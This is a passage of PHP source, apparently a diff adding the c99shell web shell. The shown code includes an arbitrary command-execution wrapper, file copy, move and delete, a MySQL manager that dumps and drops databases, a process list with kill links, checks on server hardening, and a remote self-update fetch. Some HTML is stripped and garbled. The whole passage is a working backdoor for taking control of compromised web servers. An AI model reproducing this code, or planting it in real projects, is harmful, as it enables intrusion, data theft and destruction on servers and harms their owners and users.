(!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0, $len)."...".substr($content, -$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return true; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1,1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return false;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + $ret = true; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return true; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1,1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return false;} + } + else {return false;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1,1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return false;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec")) {exec($cmd,$result); $result = join("\n",$result);} + elseif (is_callable("shell_exec")) {$result = shell_exec($cmd);} + elseif (is_callable("system")) {@ob_start(); system($cmd); $result = @ob_get_contents(); @ob_end_clean();} + elseif (is_callable("passthru")) {@ob_start(); passthru($cmd); $result = @ob_get_contents(); @ob_end_clean();} + elseif (($result = `$cmd`) !== false) {} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) +{ + function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);} +} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400) ? "r" : "-"; + $owner["write"] = ($mode & 00200) ? "w" : "-"; + $owner["execute"] = ($mode & 00100) ? "x" : "-"; + $group["read"] = ($mode & 00040) ? "r" : "-"; + $group["write"] = ($mode & 00020) ? "w" : "-"; + $group["execute"] = ($mode & 00010) ? "x" : "-"; + $world["read"] = ($mode & 00004) ? "r" : "-"; + $world["write"] = ($mode & 00002) ? "w" : "-"; + $world["execute"] = ($mode & 00001) ? "x" : "-"; + + if( $mode & 0x800 ) {$owner["execute"] = ($owner["execute"] == "x") ? "s" : "S";} + if( $mode & 0x400 ) {$group["execute"] = ($group["execute"] == "x") ? "s" : "S";} + if( $mode & 0x200 ) {$world["execute"] = ($world["execute"] == "x") ? "t" : "T";} + + return $type.$owner["read"].$owner["write"].$owner["execute"]. + $group["read"].$group["write"].$group["execute"]. + $world["read"].$world["write"].$world["execute"]; +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +} +if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate() +{ + global $updatenow; + $data = @file_get_contents($c99sh_updatefurl."?version=".$shver."&"); + if (!$data) {echo "Can't fetch update-information!";} + else + { + $data = unserialize(base64_decode($data)); + if (!is_array($data)) {echo "Corrupted update-information!";} + elseif ($shver < $data["cur"]) {$updatenow = true;} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = true;} + if (empty($file)) + { + global $win; + if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = true;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + global $SERVER_ADDR; + global $SERVER_NAME; + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"." +# Date: ".date("d.m.Y H:i:s")." +# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo ""; + if ($tbl_struct) + { + echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



     
    Fields:
    "; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
    ";} + echo "
    "; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return false;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== false) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", false); +header("Pragma: no-cache"); +global $SERVER_SOFTWARE; +if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;} +else {$win = 0;} +if (empty($tmpdir)) +{ + if (!$win) {$tmpdir = "/tmp/";} + else {$tmpdir = $_ENV["SystemRoot"];} +} +else {$tmpdir = realpath($tmpdir);} +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1,1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "ON (secure)"; +} +else {$safemode = false; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} +else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",$SERVER_SOFTWARE); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><?php echo getenv("HTTP_HOST"); ?> - c99shell

    !C99Shell v. !

    Software:  

    uname -a: ",1); ?> 

    ",1);} else {echo get_current_user();} ?> 

    Safe-mode: 

    ".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; + $i++; +} +echo "   "; +if (is_writable($d)) +{ + $wd = true; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = false; + $wdt = "[ Read-Only ]"; + echo "".view_perms_color($d).""; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "
    Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)"; +} +echo "
    "; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $letter == "a"; + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + if ($letter.":" != $v) {$letters .= "[ ".$letter." ] ";} + else {$letters .= "[ ".$letter." ] ";} + } + } + if (!empty($letters)) {echo "Detected drives: ".$letters."
    ";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; + } +} +?>



    "; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10,count($line))); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + $head[$k] = "".$head[$k]."".$y; + $head[] = "ACTION"; + $v = $ps_aux_sort[0]; + usort($prcs,"tabsort"); + if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "

    Attention! SQL-Manager is NOT ready module! Don't reports bugs.

    "; + if (!$sql_sock) {?>"; + } + echo "
    SQL Manager:
    "; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
    Can't connect
    "; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + } + echo "
    i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  •  Please, fill the form:
    UsernamePassword Database 
    HostPORT
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?>
    Home

    Please, select database
    "; + //Start center panel + $diplay = true; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,strlen($sql_query)-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} + if ($sql_act == "newtbl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = false; + echo "
    SQL-Dump:

    "; + echo "DB: 

    "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: 

    "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File: 

    "; + echo "Download:  

    "; + echo "Save to file:  "; + echo "



    1 - all, if empty"; + echo "
    "; + } + else + { + $diplay = true; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = true; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "Structure ]   "; + echo "Browse ]   "; + echo "Dump ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
    "; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

    "; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
